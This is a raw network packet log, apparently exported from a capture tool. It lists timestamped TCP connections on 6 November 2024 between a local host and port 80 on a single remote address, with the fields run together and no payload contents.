                                                                                                                                                              Nov 6, 2024 17:38:07.265530109 CET8050076150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:07.265767097 CET5007680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:07.265841007 CET8050077150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:07.266046047 CET5007780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:07.266171932 CET5007780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:07.266171932 CET5007780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:07.454585075 CET8050077150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:07.454626083 CET8050077150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:07.524337053 CET8050077150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:07.535157919 CET5007780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:07.535645962 CET5007880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:07.723258972 CET8050077150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:07.723402023 CET5007780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:07.723526955 CET8050078150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:07.723786116 CET5007880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:07.723910093 CET5007880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:07.723910093 CET5007880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:07.911606073 CET8050078150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:07.911637068 CET8050078150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:07.978750944 CET8050078150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:07.989707947 CET5007880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:07.990189075 CET5007980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:08.177615881 CET8050078150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:08.177788019 CET8050079150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:08.177866936 CET5007880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:08.177978992 CET5007980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:08.178128958 CET5007980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:08.178128958 CET5007980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:08.365833044 CET8050079150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:08.365875959 CET8050079150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:08.433710098 CET8050079150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:08.450536013 CET5007980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:08.451143980 CET5008080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:08.638489962 CET8050079150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:08.638683081 CET5007980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:08.638900995 CET8050080150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:08.639096975 CET5008080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:08.639297962 CET5008080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:08.639298916 CET5008080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:08.827275991 CET8050080150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:08.827548027 CET8050080150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:08.895629883 CET8050080150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:08.911511898 CET5008080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:08.911988974 CET5008180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:09.103463888 CET8050081150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:09.103499889 CET8050080150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:09.103655100 CET5008080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:09.103689909 CET5008180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:09.103777885 CET5008180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:09.103777885 CET5008180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:09.291763067 CET8050081150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:09.291851997 CET8050081150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:09.360475063 CET8050081150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:09.372049093 CET5008180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:09.372596979 CET5008280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:09.559906006 CET8050081150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:09.560076952 CET5008180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:09.561290979 CET8050082150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:09.561583996 CET5008280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:09.561737061 CET5008280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:09.561737061 CET5008280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:09.749846935 CET8050082150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:09.749898911 CET8050082150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:09.819318056 CET8050082150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:09.830228090 CET5008280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:09.830665112 CET5008380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.018342972 CET8050082150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:10.018577099 CET5008280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.019079924 CET8050083150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:10.019378901 CET5008380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.019510031 CET5008380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.019510031 CET5008380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.208647966 CET8050083150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:10.208688021 CET8050083150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:10.277571917 CET8050083150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:10.288180113 CET5008380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.288681030 CET5008480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.476304054 CET8050083150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:10.476475000 CET8050084150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:10.476562977 CET5008380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.476677895 CET5008480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.476794004 CET5008480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.476794958 CET5008480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.665213108 CET8050084150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:10.665251017 CET8050084150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:10.734698057 CET8050084150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:10.748336077 CET5008480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.748754978 CET5008580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.937366009 CET8050085150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:10.937376976 CET8050084150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:10.937657118 CET5008480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.937657118 CET5008580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.937752008 CET5008580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:10.937752008 CET5008580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:11.125842094 CET8050085150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:11.125850916 CET8050085150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:12.305102110 CET8050085150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:12.315644979 CET5008580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:12.316045046 CET5008680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:12.504224062 CET8050085150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:12.504272938 CET8050086150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:12.504422903 CET5008580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:12.504431009 CET5008680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:12.504622936 CET5008680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:12.504622936 CET5008680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:12.693820953 CET8050086150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:12.693852901 CET8050086150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:12.763509035 CET8050086150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:12.784615993 CET5008680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:12.785526991 CET5008780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:12.974308968 CET8050086150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:12.974355936 CET8050087150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:12.974634886 CET5008680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:12.974699974 CET5008780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:12.974826097 CET5008780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:12.974827051 CET5008780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:13.162425995 CET8050087150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:13.162434101 CET8050087150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:13.230046034 CET8050087150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:13.250261068 CET5008780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:13.250993967 CET5008880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:13.439728975 CET8050087150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:13.439977884 CET5008780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:13.440238953 CET8050088150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:13.440417051 CET5008880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:13.440557957 CET5008880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:13.440557957 CET5008880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:13.628437042 CET8050088150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:13.628614902 CET8050088150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:13.698568106 CET8050088150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:13.714730024 CET5008880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:13.715218067 CET5008980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:13.903074026 CET8050089150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:13.903198957 CET8050088150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:13.903245926 CET5008980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:13.903378963 CET5008880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:13.903443098 CET5008980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:13.903444052 CET5008980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:14.091344118 CET8050089150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:14.091387987 CET8050089150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:14.167052031 CET8050089150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:14.179305077 CET5008980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:14.179800987 CET5009080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:14.367578030 CET8050089150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:14.367837906 CET5008980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:14.368011951 CET8050090150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:14.368244886 CET5009080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:14.368313074 CET5009080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:14.368313074 CET5009080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:14.556710958 CET8050090150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:14.556759119 CET8050090150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:14.625870943 CET8050090150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:14.637486935 CET5009080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:14.637912989 CET5009180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:14.825586081 CET8050090150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:14.825757027 CET5009080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:14.826690912 CET8050091150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:14.826884031 CET5009180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:14.827049971 CET5009180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:14.827049971 CET5009180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.015714884 CET8050091150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:15.015727997 CET8050091150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:15.083797932 CET8050091150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:15.101133108 CET5009180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.101545095 CET5009280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.289361000 CET8050091150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:15.289619923 CET5009180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.289690971 CET8050092150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:15.289871931 CET5009280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.289959908 CET5009280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.289959908 CET5009280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.478130102 CET8050092150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:15.478166103 CET8050092150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:15.545964003 CET8050092150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:15.565922022 CET5009280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.566553116 CET5009380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.754573107 CET8050092150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:15.754620075 CET8050093150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:15.754843950 CET5009280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.754843950 CET5009380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.755012989 CET5009380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.755012989 CET5009380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:15.943041086 CET8050093150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:15.943070889 CET8050093150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:16.013241053 CET8050093150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:16.024019003 CET5009380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.024588108 CET5009480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.212063074 CET8050093150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:16.212294102 CET5009380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.212577105 CET8050094150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:16.212762117 CET5009480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.212882042 CET5009480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.212882042 CET5009480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.400594950 CET8050094150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:16.400774956 CET8050094150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:16.475486994 CET8050094150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:16.488482952 CET5009480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.489209890 CET5009580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.676924944 CET8050094150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:16.677205086 CET5009480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.677469015 CET8050095150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:16.677710056 CET5009580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.678721905 CET5009580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.678721905 CET5009580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.872519016 CET8050095150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:16.872565031 CET8050095150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:16.947309017 CET8050095150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:16.964813948 CET5009580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:16.965579033 CET5009680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:17.153224945 CET8050095150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:17.153368950 CET5009580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:17.153562069 CET8050096150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:17.153717995 CET5009680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:17.153860092 CET5009680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:17.153860092 CET5009680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:17.344494104 CET8050096150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:17.344527006 CET8050096150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:17.413290024 CET8050096150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:17.424957037 CET5009680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:17.425534964 CET5009780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:17.613809109 CET8050097150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:17.613842964 CET8050096150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:17.614109993 CET5009680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:17.614109993 CET5009780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:17.614243984 CET5009780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:17.614243984 CET5009780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:17.802476883 CET8050097150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:17.802515030 CET8050097150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:17.873090029 CET8050097150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:17.887674093 CET5009780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:17.888128042 CET5009880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:18.075845003 CET8050097150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:18.075905085 CET8050098150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:18.076020956 CET5009780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:18.076148987 CET5009880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:18.076282024 CET5009880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:18.076282024 CET5009880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:18.264677048 CET8050098150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:18.264722109 CET8050098150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:18.331873894 CET8050098150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:18.352310896 CET5009880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:18.353018045 CET5009980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:18.540527105 CET8050098150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:18.540788889 CET5009880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:18.541618109 CET8050099150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:18.541836977 CET5009980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:18.541932106 CET5009980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:18.541932106 CET5009980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:18.730480909 CET8050099150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:18.730515957 CET8050099150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:18.799057007 CET8050099150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:18.815634012 CET5009980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:18.816422939 CET5010080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.004496098 CET8050099150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:19.004652023 CET5009980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.004993916 CET8050100150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:19.005212069 CET5010080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.005379915 CET5010080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.005379915 CET5010080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.194024086 CET8050100150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:19.194031954 CET8050100150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:19.262936115 CET8050100150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:19.287638903 CET5010080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.288537025 CET5010180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.476246119 CET8050100150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:19.476453066 CET8050101150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:19.476465940 CET5010080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.476727009 CET5010180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.477790117 CET5010180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.477790117 CET5010180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.665875912 CET8050101150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:19.665920973 CET8050101150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:19.735498905 CET8050101150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:19.747690916 CET5010180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.748215914 CET5010280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.936011076 CET8050101150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:19.936233997 CET5010180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.936305046 CET8050102150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:19.936520100 CET5010280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.936630964 CET5010280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:19.936630964 CET5010280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:20.124727964 CET8050102150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:20.124747992 CET8050102150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:20.196485043 CET8050102150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:20.208180904 CET5010280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:20.208635092 CET5010380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:20.397681952 CET8050103150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:20.397727966 CET8050102150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:20.397893906 CET5010280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:20.397893906 CET5010380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:20.398034096 CET5010380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:20.398034096 CET5010380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:20.592511892 CET8050103150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:20.592555046 CET8050103150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:20.679182053 CET8050103150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:20.723511934 CET5010380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:20.849154949 CET5010380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:20.849889040 CET5010480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:21.037504911 CET8050103150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:21.037740946 CET5010380192.168.11.20150.241.91.218
